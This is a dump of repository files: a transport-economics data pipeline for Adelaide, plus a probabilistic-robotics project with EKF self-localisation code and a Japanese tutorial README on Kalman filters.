roads_in_adelaide\nsa2_adelaide_with_transport_attributes.to_pickle(intermediate_data_path+\"sa2_node_with_only_transport_attributes.pickle\")\nroads_in_adelaide.to_file(intermediate_data_path+\"shapefiles/sa2_roads_in_adelaide.shp\")\n# sw: Wow. Pickle can save & read the shapefiles with crs info kept.\n# sw: I still saved to shp files because QGIS cannot read pickle, I guess.\n# with open(\"./data/sa2_adelaide_with_transport_attributes.pickle\", 'rb') as f:\n# x_file = pickle.load(f)\n# print(x_file.crs)\n\n#endregion\n\n\n#region 5. Turn road shapefiles to the attributes of SA2s' edges.\n# It takes about five minutes for processing.\n# roads_in_adelaide = gpd.read_file(\"./data/shapefiles/sa2_roads_in_adelaide.shp\")\n\n# 1. edge file\nsa2_adelaide_edge = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n\n# 2. transport attribute file\nwith open(intermediate_data_path+\"sa2_node_with_only_transport_attributes.pickle\", 'rb') as f:\n sa2_adelaide_with_transport_attributes = pickle.load(f)\n\n# 3. 
OD path file\nwith open(intermediate_data_path+'OD_full_path.pickle', 'rb') as f:\n OD_full_path = pickle.load(f)\n\n# add the road and intersection attributes to the sa2_adelaide_edge data set.\nattribute_name_list = ['class_ART', 'class_BUS', 'class_COLL',\n 'class_HWY', 'class_LOCL', 'class_SUBA',\n 'class_TRK2', 'class_TRK4', 'class_UND', 'num_roads', 'num_nodes', 'num_1degree',\n 'num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']\n\nsa2_adelaide_edge[attribute_name_list] = 0.0 # init values\n\n# add road and intersection attributes to the edge df.\nfor idx in np.arange(sa2_adelaide_edge.shape[0]):\n if idx%1000 == 0:\n print(idx)\n origin = sa2_adelaide_edge.loc[idx, 'O']\n destination = sa2_adelaide_edge.loc[idx, 'D']\n o_idx = sa2_adelaide_with_transport_attributes.index[sa2_adelaide_with_transport_attributes.SA2_MAIN16 == origin].tolist()[0]\n d_idx = sa2_adelaide_with_transport_attributes.index[sa2_adelaide_with_transport_attributes.SA2_MAIN16 == destination].tolist()[0]\n # print(o_idx,d_idx)\n\n try:\n # OD_full_path might not have all the shortest path...\n # note that the OD_full_path idx is consistent with sa2_adelaide.\n idx_list_on_shortest_path = OD_full_path[(o_idx, d_idx)]\n for node_on_shortest_path in idx_list_on_shortest_path:\n sa2_adelaide_edge.loc[idx, attribute_name_list] += sa2_adelaide_with_transport_attributes.loc[\n node_on_shortest_path, attribute_name_list]\n except KeyError as error:\n pass\n\n# output two pickles:\n# node network with transport info: sa2_adelaide_with_transport_attributes\n# edge network with transport info: sa2_adelaide_edge\nsa2_adelaide_with_transport_attributes.to_pickle(intermediate_data_path+'sa2_node_with_only_transport_attributes.pickle')\nsa2_adelaide_edge.to_pickle(intermediate_data_path+'sa2_edge_with_only_transport_attributes.pickle')\n\n#endregion\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8541666865348816,
"alphanum_fraction": 0.8541666865348816,
"avg_line_length": 48,
"blob_id": "91344633af347fddb6c2fb628780144348bfcc51",
"content_id": "79f0d72566a9e059b3229685f5692b9233ff45cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 1,
"path": "/test.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import utils.util.compute_road_attributes as cra"
},
{
"alpha_fraction": 0.3176761567592621,
"alphanum_fraction": 0.3238566219806671,
"avg_line_length": 39.349998474121094,
"blob_id": "3a162d2438c796c841acc32e979acf040ab06b0c",
"content_id": "52bb9a2d460d290c8cf07974bdde07fc1a87221d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 809,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 20,
"path": "/Makefile",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": ".PHONY: requirements\n\n#################################################################################\n# GLOBALS #\n#################################################################################\n\n\n\n#################################################################################\n# COMMANDS #\n#################################################################################\n\n## Install Python Dependencies\nrequirements: \n\t$(PYTHON_INTERPRETER) pip3 install -U pip setuptools wheel\n\t$(PYTHON_INTERPRETER) pip3 install -r requirements.txt\n\n## Create intermediate data \ncreate_intermediate_data:\n\t$(PYTHON_INTERPRETER) src/d02_intermediate/preprocess_0_shapefiles.py\n\n\n"
},
{
"alpha_fraction": 0.7452793717384338,
"alphanum_fraction": 0.7481695413589478,
"avg_line_length": 73.9565200805664,
"blob_id": "56b00f827e4182f04a2c82f027eaffce12c02472",
"content_id": "18915983137db00734f233382acc73b5522777ab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5190,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 69,
"path": "/src/d06_reporting/copy_results_to_paper_repo.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# this script moves the useful outputs to the paper repository.\n\nimport pandas as pd\nimport shutil\nimport os\nimport sys\n\n# from path\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# to overleaf file\noverleaf_path = '/Users/shenhaowang/Dropbox (MIT)/Apps/Overleaf/Gravity model for econ and transport networks/'\n\n# from & to file\nfile_dic = {}\n\n# tables\nfile_dic[model_output_path+'model1_table_od_duration.txt'] = overleaf_path+'tables/'+'model1_table_od_duration.txt'\nfile_dic[model_output_path+'model2_table_consumption_amount_mcc_source.txt'] = overleaf_path+'tables/'+'model2_table_consumption_amount_mcc_source.txt'\nfile_dic[model_output_path+'model2_table_consumption_count_mcc_source.txt'] = overleaf_path+'tables/'+'model2_table_consumption_count_mcc_source.txt'\nfile_dic[model_output_path+'model2_table_flow_agents.txt'] = overleaf_path+'tables/'+'model2_table_flow_agents.txt'\nfile_dic[model_output_path+'model3_table_median_income_per_job_aud_persons.txt'] = overleaf_path+'tables/'+'model3_table_median_income_per_job_aud_persons.txt'\n\n# figs\n#\nfile_dic[report_path+'local_environment/'+'Adelaide_area.png'] = overleaf_path+'figs/'+'Adelaide_area.png'\n#\nfile_dic[report_path+'node_visual/'+'node_socioecon_median_income.png'] = overleaf_path+'figs/'+'node_socioecon_median_income.png'\nfile_dic[report_path+'node_visual/'+'node_socioecon_pop_density.png'] = overleaf_path+'figs/'+'node_socioecon_pop_density.png'\nfile_dic[report_path+'node_visual/'+'node_poi_count_agg_density.png'] = overleaf_path+'figs/'+'node_poi_count_agg_density.png'\nfile_dic[report_path+'node_visual/'+'node_poi_entropy_agg_density.png'] = overleaf_path+'figs/'+'node_poi_entropy_agg_density.png'\n#\nfile_dic[report_path+'edge_visual/'+'edge_consumption_amount_mcc_source.png'] = overleaf_path+'figs/'+'edge_consumption_amount_mcc_source.png'\nfile_dic[report_path+'edge_visual/'+'edge_consumption_count_mcc_source.png'] = overleaf_path+'figs/'+'edge_consumption_count_mcc_source.png'\nfile_dic[report_path+'edge_visual/'+'edge_flow_agents.png'] = overleaf_path+'figs/'+'edge_flow_agents.png'\nfile_dic[report_path+'edge_visual/'+'edge_consumption_amount_mcc_source_sparse.png'] = overleaf_path+'figs/'+'edge_consumption_amount_mcc_source_sparse.png'\nfile_dic[report_path+'edge_visual/'+'edge_consumption_count_mcc_source_sparse.png'] = overleaf_path+'figs/'+'edge_consumption_count_mcc_source_sparse.png'\nfile_dic[report_path+'edge_visual/'+'edge_flow_agents_sparse.png'] = overleaf_path+'figs/'+'edge_flow_agents_sparse.png'\n#\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_consumption_amount.png'] = overleaf_path+'figs/'+'pred_consumption_amount.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_consumption_count.png'] = overleaf_path+'figs/'+'pred_consumption_count.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_flow.png'] = overleaf_path+'figs/'+'pred_flow.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_inc.png'] = overleaf_path+'figs/'+'pred_inc.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_travel_time.png'] = overleaf_path+'figs/'+'pred_travel_time.png'\n#\nfile_dic[report_path+'policy_simulation/'+'simulation_consumption_amount_increase.png'] = overleaf_path + 'figs/'+'simulation_consumption_amount_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_consumption_count_increase.png'] = overleaf_path + 
'figs/'+'simulation_consumption_count_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_flow_agents_increase.png'] = overleaf_path + 'figs/'+'simulation_flow_agents_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_od_duration_save.png'] = overleaf_path + 'figs/'+'simulation_od_duration_save.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_income_increase.png'] = overleaf_path + 'figs/'+'simulation_income_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_income_increase_ratio.png'] = overleaf_path + 'figs/'+'simulation_income_increase_ratio.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_diversity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'simulation_diversity_based_consumption_opp.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_amenity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'simulation_amenity_based_consumption_opp.png'\n#\nfile_dic[report_path+'accessibility_metrics/'+'amenity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'amenity_based_consumption_opp.png'\nfile_dic[report_path+'accessibility_metrics/'+'diversity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'diversity_based_consumption_opp.png'\n#\nfile_dic[report_path+'descriptive_visual/'+'flow.png'] = overleaf_path + 'figs/'+'descriptive_flow.png'\nfile_dic[report_path+'descriptive_visual/'+'socioecon.png'] = overleaf_path + 'figs/'+'descriptive_socioecon.png'\nfile_dic[report_path+'descriptive_visual/'+'travel.png'] = overleaf_path + 'figs/'+'descriptive_travel.png'\n\n\n\n# copy and paste\nfor key_ in file_dic.keys():\n from_file = key_\n target_file = file_dic[key_]\n shutil.copy2(from_file, target_file)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
}
] | 22 |
zacharyselk/IPyLeafletExtention
|
https://github.com/zacharyselk/IPyLeafletExtention
|
92569c01890b44240f85813a8a0b81d17b576e78
|
c63f0d03726df51b45324bb6c847d33b7b7e3719
|
28084cc5d73651eb7aef6c74e9a6fb6ab8a14033
|
refs/heads/master
| 2020-03-19T07:17:08.908312 | 2018-06-05T01:59:59 | 2018-06-05T01:59:59 | 136,101,589 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 39.53333282470703,
"blob_id": "814c247a1cb80ffbcd748469e4252568f13b2daf",
"content_id": "82c085fa210943cc0e6fddc2352956f666792f74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 15,
"path": "/lib/constants.py",
"repo_name": "zacharyselk/IPyLeafletExtention",
"src_encoding": "UTF-8",
"text": "HTML_BUTTON = '''<html>\n<div>\n<p id='station_name'>%s</p>\n<p id='lat'>Latitude: %s<br>Longitude: %s</p>\n<p id='index' hidden>%s</p>\n\n<button type='button' onclick='var var_station = document.getElementById(\"station_name\").innerHTML; \nvar var_index = document.getElementById(\"index\").innerHTML; \nvar command = \"SET_GLOBAL_SHOW_STATION(\" + var_index + \")\"; \nconsole.log(\"Executing Command: \" + command); \nvar kernel = IPython.notebook.kernel; kernel.execute(command); \ncomm = Jupyter.notebook.kernel.comm_manager.new_comm(\"_button_\");\ncomm.send({\"hello\": \"goodbye\"});'>Show in table</button>\n</div>\n</html>'''\n"
},
{
"alpha_fraction": 0.7759562730789185,
"alphanum_fraction": 0.7773224115371704,
"avg_line_length": 42.05882263183594,
"blob_id": "377d70af768de3c15879d98e2efe6dabadfd83e8",
"content_id": "fa52df91a259b18531e02bac5687f42b9dcc9df9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 17,
"path": "/README.md",
"repo_name": "zacharyselk/IPyLeafletExtention",
"src_encoding": "UTF-8",
"text": "## Overview\nThis is a library that is a basic extension to the ipyleaflet library as well as provides some documentation/examples of how to use the ipyleaflet library in general. \n\n## Download and Use\nFirst you will need to download the depenancies, with<br>\n ```pip install ipyleaflet tqdm requests beautifulsoup4```\n then ipyleaflet will need to be enabled to work with jupyter notebooks, with<br>\n ```jupyter nbextension enable --py ipyleaflet```\n \n\nTo download simply clone the repository with<br>\n```git clone https://github.com/zacharyselk/IPyLeafletExtention.git```\n\nAfter it is downloaded move the contents of lib into your project directory, then it can be imported with \n```py\nfrom MapExtention import MapExtention\n```\n"
}
] | 2 |
shuhei55/PROBABILISTIC-ROBOTICS
|
https://github.com/shuhei55/PROBABILISTIC-ROBOTICS
|
c369a324173b1c1f5abca70292928e50326e3568
|
7fcd55341468221419b8542bb9905c80eec74ef9
|
8b1439e260f68227124a13b0db467ee0e6a017c5
|
refs/heads/master
| 2020-05-30T06:11:35.084158 | 2020-02-01T03:55:31 | 2020-02-01T03:55:31 | 189,575,496 | 9 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4164205491542816,
"alphanum_fraction": 0.4743059575557709,
"avg_line_length": 33.551021575927734,
"blob_id": "29827589fd130ffb134ce412275a463905e39798",
"content_id": "cd21c36b16a5ccce00280e8d9e3fef334c32517e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1693,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 49,
"path": "/single_ekf/hoge.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\n\n\nclass Map:\n DT = 10 #ms\n def __init__(self):\n self.x = np.array([[0,0,0]])\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def set_pos(self, pos):\n self.x = np.array(pos)\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def update(self, sim):\n self.x += np.array([[0,0,sim.get_gyro() * self.DT]])\n self.x += (np.array([[np.cos(-self.x[0][2]),-np.sin(-self.x[0][2])],[np.sin(-self.x[0][2]),np.cos(-self.x[0][2])],[0,0]]) @ sim.get_enc()).T\n self.Pxy += np.array([[1600,0,0],\n [0,1600,0],\n [0,0,0.00000001]])\n\n\n def differential(self, angle):\n return np.array([[-(1./np.sin(angle+self.x[0][2])), 0, -self.x[0][0]*(-np.cos(angle+self.x[0][2])/(np.sin(angle+self.x[0][2])**2))]])\n\n def h(self, angle):\n return -self.x[0][0]/np.sin(angle+self.x[0][2])\n\n def update2(self, sim):\n angle = 1.57\n y = sim.get_single_wall_length(angle)\n if y == np.inf:\n pass\n else :\n #y_p = - self.x[0] / np.float64(np.sin(angle + self.x[2]))\n filter_R = np.array([[100]])\n jacobian = self.differential(angle)\n kalman_gain = (self.Pxy @ jacobian.T) / (jacobian @ self.Pxy @ jacobian.T + filter_R)\n self.x += kalman_gain.T * (y - self.h(angle))\n self.Pxy = (1 - kalman_gain @ jacobian) * self.Pxy\n"
},
{
"alpha_fraction": 0.3918918967247009,
"alphanum_fraction": 0.6081081032752991,
"avg_line_length": 36,
"blob_id": "422008330cdfd27e20e96bb66a79b288a4a85ce0",
"content_id": "e19a4340028e0becc09623ef9df4ad1ce8a797a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 296,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 8,
"path": "/config/config.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "from drawer import drawer\n\ndef init(drawer):\n img = drawer.draw_line([-4000,-4000], [-4000,4000],\"k\")\n img = drawer.draw_line([4000,4000], [4000,-4000],\"k\")\n img = drawer.draw_line([4000,4000], [-4000,4000],\"k\")\n img = drawer.draw_line([4000,-4000], [-4000,-4000],\"k\")\n return img\n"
},
{
"alpha_fraction": 0.7432187795639038,
"alphanum_fraction": 0.7938517332077026,
"avg_line_length": 34.068294525146484,
"blob_id": "908145c9f38e2db969f35da892bc71eb580fdcac",
"content_id": "d07cc00ef5c60f6429726178f0ea1b326ce43386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13907,
"license_type": "no_license",
"max_line_length": 653,
"num_lines": 205,
"path": "/lec/README.md",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "# 自己位置推定講習\n* 基本的な自己位置推定をしてみたり\n* ベイズの定理を用いた自己位置推定をしてみたりしましょう\n## 環境構築\n* このプログラムは普通のUbuntu18.04とWSLのUbuntu18.04でのみ動作確認しています(Macは知らん〇ね)\n#### grip\n* Markdownを読むソフトがない人は個人的なおすすめはgripというソフトです\n```\n$ sudo apt update\n$ sudo apt install grip\n```\n * このディレクトリの中でgrip -bとコマンドを打てば勝手にウェブブラウザが起動してgithubで見ているように簡単にREADME.mdが読めます\n#### python3\n* このプロジェクトはpython3を使います\n* python3の環境構築は人それぞれで好きにやってください(jupyter-notebookやanacondaやpyenvなどなど)\n* 一番やってはいけないのはanacondaでやってたのに以下の方法もやるとかです(コンフリクトします)\n* ある程度理解しているなら好きなようにやって良いですが、とりあえず以下の方法でをおすすめします\n* python3のインストール\n```\n$ sudo apt update\n$ sudo apt install python3 python3-pip python-pip\n$ sudo pip3 install numpy matplotlib\n```\n#### WSL\n* WSLの人は自分でなんとかしてほしいですが一応僕の環境で動いた対処方は書いておきます\n * [参考ページ](http://ai-gaminglife.hatenablog.com/entry/2019/04/29/204841)\n * XmingまたはVcXsrvなどをインストールする\n * さっきのコマンドに追加で以下のコマンドをする\n```\n$ sudo apt install python3-tk\n```\n#### 動作確認\n* 以下のコマンドでdefault.pyが動きしたの写真のようになればよい(赤の点のプロットの仕方は異なります)\n```\n$ python3 default.py\n```\n\n* 左上のツールを使うと拡大できたりするのでもっと見やすくなると思います\n\n## シミュレーター\n* 詳しくはシミュレーターの関数一覧などを読めば良いがどのようなシミュレーターかについて\n* シミュレーターはx,y,thetaの3変数のとそれの一回微分と二回微分の状態量をもちます\n* update関数が呼ばれると一定の分散をもちながらそれぞれ積分して時間更新されます\n* 制御周期は10msとしています\n* エンコーダーはマシン座標系でx方向とy方向に非常に精度高く並行についているとします\n* エンコーダーの返す値は差分であり、速度ではありません\n* gyroセンサーもマシンに剛に固定されており精度高くマシンの角速度を返してくれるとします\n## よくある決定論的自己位置推定\n* とりあえず環境構築でシミュレーターを動かすことはできたでしょうか\n* じゃあさっそく簡単な自己位置推定をしてみましょう\n* シミュレーターの関数に実装されているget\\_enc関数とget\\_gyro関数を用いて自己位置推定をしてみましょう\n\n```\ntheta += get_gyro() * dt\nX += (回転行列[-theta]) * get_enc()\n```\n* 簡単なモデルなら上の式みたいな感じでしょうか\n* 実装してみましょう\n```python3:main.py\n#! /usr/bin/python3\n\nfrom sim import simulator\nfrom drawer import drawer\nimport numpy as np\nfrom config import config\n\ndef plot(data):\n global theta, X\n sim.update()\n #自己位置推定の更新\n theta += sim.get_gyro() * 10\n X += np.array([[np.cos(-theta),-np.sin(-theta)],[np.sin(-theta), np.cos(-theta)]]) @ sim.get_enc() #@は内積を意味する(回転行列をかけているだけ)\n ball_img = drawer.draw_point(sim.x,sim.y)\n ball_img = drawer.draw_point(X[0][0], X[1][0], \"g\")\n return ball_img\n\nsim = simulator.Sim(0.,0.,1.,1.,0.,0.) #シミュレーターのコンストラクタ\n\n#自己位置の初期値\ntheta = 0.\nX = np.array([[0.,0.]]).T\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n```\n\n* どうでしょうかそれっぽく自己位置推定できたのではないでしょうか?\n* でも当然ですがだんだんずれていってしまいますね\n* モデルをもっと正確にしたりと、もう少し改善の方法はありますがこれがエンコーダーとジャイロセンサーでの自己位置推定の限界でしょう\n* こっからよくするならば、測距センサーやラインセンサーなどを用いるしかありません\n* 測距センサーはシミュレーターに実装されているのでそれを使ってみるのも良いと思います\n* しかし、測距センサーをうまく自己位置補正につかえるでしょうか?\n* でっち上げで読んでいる柵を予測して適当に自己位置を書き換えることで補正できるでしょう(大体の大学はこういうことしてるんじゃないかなあ)\n* でもマシンが予測しない位置にいたり、帰ってきた値がノイズでおかしくなってたりたりしたときの対応が面倒くさいですね\n\n## 確率論的自己位置推定\n* まずここからは決定論的に自己位置を決めるのではなくて、確率論的に自己位置を推定します\n* どういうことかというと、自己位置の状態量(例えばx,y,theta)とその値の分散を自己位置の情報として常に持ち、それらを時間ごとに更新していくというものです\n* つまり、マシンの自己位置はだいたいこの値を中心としてこの分散の中のどこかにはいるだろうといった感じで自己位置推定を行います\n* 試しに上で行った自己位置推定を確率論的にしたものが下のコードです\n```python3:main.py\n#! 
\n\n## SingleModelEKF (Extended Kalman Filter)\n* Having the machine's pose handed to us periodically, as above, basically never happens in the real world, so this time let's correct the pose by reading a fence with a range sensor\n* Here we use the EKF, an algorithm that extends the Kalman filter to nonlinear models\n* See references such as [this page](https://qiita.com/Crafty_as_a_Fox/items/55448e2ed9ce0f340814)\n* [Probabilistic Robotics](https://www.amazon.co.jp/%E7%A2%BA%E7%8E%87%E3%83%AD%E3%83%9C%E3%83%86%E3%82%A3%E3%82%AF%E3%82%B9-%E3%83%97%E3%83%AC%E3%83%9F%E3%82%A2%E3%83%A0%E3%83%96%E3%83%83%E3%82%AF%E3%82%B9%E7%89%88-Sebastian-Thrun/dp/4839952981/ref=sr_1_1?adgrpid=57386821630&gclid=Cj0KCQjww7HsBRDkARIsAARsIT42112TVnENbOvkkIqk5Docou4Q_m81SLI7YIrpAYgU0pNVst1jGOIaAgMcEALw_wcB&hvadid=338541146619&hvdev=c&hvlocphy=1009279&hvnetw=g&hvpos=1t1&hvqmt=e&hvrand=7674351478518788021&hvtargid=kwd-335165749908&hydadcr=16038_11170849&jp-ad-ap=0&keywords=%E7%A2%BA%E7%8E%87%E3%83%AD%E3%83%9C%E3%83%86%E3%82%A3%E3%82%AF%E3%82%B9&qid=1569489131&s=gateway&sr=8-1) is also a good reference\n* With multiple fences, deciding which fence is being read is a pain, so let's first do the estimation with a model that has only a single fence\n* It is implemented in single\\_ekf/hoge, so read the code there\n* You can see the pose being corrected every 10 steps\n* However, what is implemented there only reads the fence lying on the y axis, so the x position gets corrected but the y position does not\n\n\n## MultiModelEKF (Extended Kalman Filter)\n* This time let's implement something that reads multiple fences, also estimates which fence is being read, and corrects the pose on top of that\n* It is implemented in multi\\_model\\_ekf/hoge, so read the code there\n* With this we have a fairly standard self-localization (clap clap)\n* Zero explanation, lol
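\n* For reference, here is a condensed sketch of the update2 correction from single\\_ekf/hoge (the single fence on x = 0); the shapes are simplified to a flat (3,) state and a 3x3 covariance, so treat the exact names and shapes as illustrative\n```python3\nimport numpy as np\n\n# one EKF measurement update for a range reading z toward the wall at x = 0;\n# x = [x, y, theta], P is the 3x3 covariance, angle is the sensor direction\ndef ekf_correct(x, P, z, angle, R=100.0):\n s = np.sin(angle + x[2])\n h = -x[0] / s # predicted range to the wall\n H = np.array([[-1.0 / s, 0.0, -x[0] * (-np.cos(angle + x[2]) / s**2)]]) # Jacobian of h at x\n K = P @ H.T / (H @ P @ H.T + R) # Kalman gain, shape (3, 1)\n x = x + (K * (z - h)).flatten() # correct the state with the innovation z - h\n P = (np.eye(3) - K @ H) @ P # shrink the covariance\n return x, P\n```\n* Because the measurement model h is nonlinear, its Jacobian H plays the role that the observation matrix plays in the linear Kalman filter; everything else is the same gain-and-correct pattern as before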
\n\n## UKF (Unscented Kalman Filter)\n* An algorithm extending the Kalman filter to nonlinear models, on a par with the EKF\n* Compared with the EKF:\n * it samples 2 * (state dimension) + 1 points and propagates them through time, so it is slower than the EKF\n * the EKF required computing Jacobians, while the UKF does not, which makes it easier to use\n* Not implemented here yet\n* Read [this paper](https://www.jstage.jst.go.jp/article/isciesci/50/7/50_KJ00004329717/_article/-char/ja/) and you will understand it\n* Furthermore, there is an excellent algorithm that keeps the computation positive definite (the Square Root Unscented Kalman Filter); reading [this paper](https://ieeexplore.ieee.org/document/940586) should make it clear\n * note that it requires a [QR](http://nalab.mind.meiji.ac.jp/~mk/labo/text/eigenvalues/node32.html) decomposition, so it is slower than the standard UKF\n* If you implement one for real, you should use the latter algorithm\n\n## EIF (Extended Information Filter)\n* The nonlinear extension of the information filter, which is the dual of the Kalman filter for estimation problems\n* The Kalman filter has a fast time-update step, while the information filter has a fast correction step, so it seems best to choose depending on the situation\n* I don't understand it yet myself, so I can't implement it\n* Read Probabilistic Robotics and you will get it\n\n## Particle Filter\n* Read Probabilistic Robotics and you will get it\n\n## Closing\n* We implemented the methods above for self-localization, but in fact these algorithms are not only for self-localization\n* We localized by updating the pose state in real time, but those state variables can just as well be machine parameters\n* For example, there are machine parameters such as the torque constant and the no-load current\n* Parameters like these can also be estimated with the algorithms above in exactly the same way as before: build a model, actually drive the machine, and use the commanded current and the measured values\n* A common alternative is to compute the parameters from the inputs and measurements with least squares and the like, but with these methods you can handle all sorts of complex measurements (models), and by looking at the variance you can easily tell how reliable the computed parameters (states) are\n* I might also make a simple parameter-estimation exercise at some point\n"
},
{
"alpha_fraction": 0.41313067078590393,
"alphanum_fraction": 0.4614734947681427,
"avg_line_length": 36.29921340942383,
"blob_id": "444531cf10a4027a6e787e4ad5c77caef8aa3461",
"content_id": "58fd7ee2610b83249bc861e2a9c7d591036522f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4737,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 127,
"path": "/multi_model_ekf/hoge.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport numpy as np\nimport numpy.linalg as LA\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\n\n\nclass Map:\n DT = 10 #ms\n def __init__(self):\n self.x = np.array([[0,0,0]])\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def set_pos(self, pos):\n self.x = np.array(pos)\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def update(self, sim):\n self.x += np.array([[0,0,sim.get_gyro() * self.DT]])\n self.x += (np.array([[np.cos(-self.x[0][2]),-np.sin(-self.x[0][2])],[np.sin(-self.x[0][2]),np.cos(-self.x[0][2])],[0,0]]) @ sim.get_enc()).T\n self.Pxy += np.array([[1600,0,0],\n [0,1600,0],\n [0,0,0.00000001]])\n\n\n def differential_1(self, angle):\n return np.array([[-(1./np.sin(angle+self.x[0][2])), 0, (4000-self.x[0][0])*(-np.cos(angle+self.x[0][2])/(np.sin(angle+self.x[0][2])**2))]])\n\n def differential_2(self, angle):\n return np.array([[-(1./np.sin(angle+self.x[0][2])), 0, (-4000-self.x[0][0])*(-np.cos(angle+self.x[0][2])/(np.sin(angle+self.x[0][2])**2))]])\n\n def differential_3(self, angle):\n return np.array([[0, -(1./np.cos(angle+self.x[0][2])), (4000-self.x[0][1])*(np.sin(angle+self.x[0][2])/(np.cos(angle+self.x[0][2])**2))]])\n\n def differential_4(self, angle):\n return np.array([[0, -(1./np.cos(angle+self.x[0][2])), (-4000-self.x[0][1])*(np.sin(angle+self.x[0][2])/(np.cos(angle+self.x[0][2])**2))]])\n\n def h_1(self, angle):\n tmp = (4000-self.x[0][0])/np.sin(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def h_2(self, angle):\n tmp = (-4000-self.x[0][0])/np.sin(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def h_3(self, angle):\n tmp = (4000-self.x[0][1])/np.cos(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def h_4(self, angle):\n tmp = (-4000-self.x[0][1])/np.cos(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def update2(self, sim):\n angle = 1.57\n #angle = 0\n filter_R = np.array([[1600]])\n log_P_tmp = -0.5*np.log(2*np.pi)-0.5*np.log(np.abs(LA.det(filter_R)))\n y = sim.get_multi_wall_length(angle)\n if y == np.inf:\n pass\n else :\n h_y = np.array([self.h_1(angle),self.h_2(angle),self.h_3(angle),self.h_4(angle)])\n print(h_y,y)\n log_P = log_P_tmp-0.5*((y-h_y)*(1/filter_R)*(y-h_y))\n #print(log_P)\n if log_P.max() < -10:\n pass\n else :\n argmax = log_P.argmax()\n if argmax == 0:\n jacobian = self.differential_1(angle)\n elif argmax == 1:\n jacobian = self.differential_2(angle)\n elif argmax == 2:\n jacobian = self.differential_3(angle)\n else :\n jacobian = self.differential_4(angle)\n kalman_gain = (self.Pxy @ jacobian.T) / (jacobian @ self.Pxy @ jacobian.T + filter_R)\n print(\"hoge\")\n self.x += kalman_gain.T * (y - h_y[argmax])\n self.Pxy = (1 - kalman_gain @ jacobian) * self.Pxy\n #angle = 1.57\n angle = 3.14\n y = sim.get_multi_wall_length(angle)\n if y == np.inf:\n 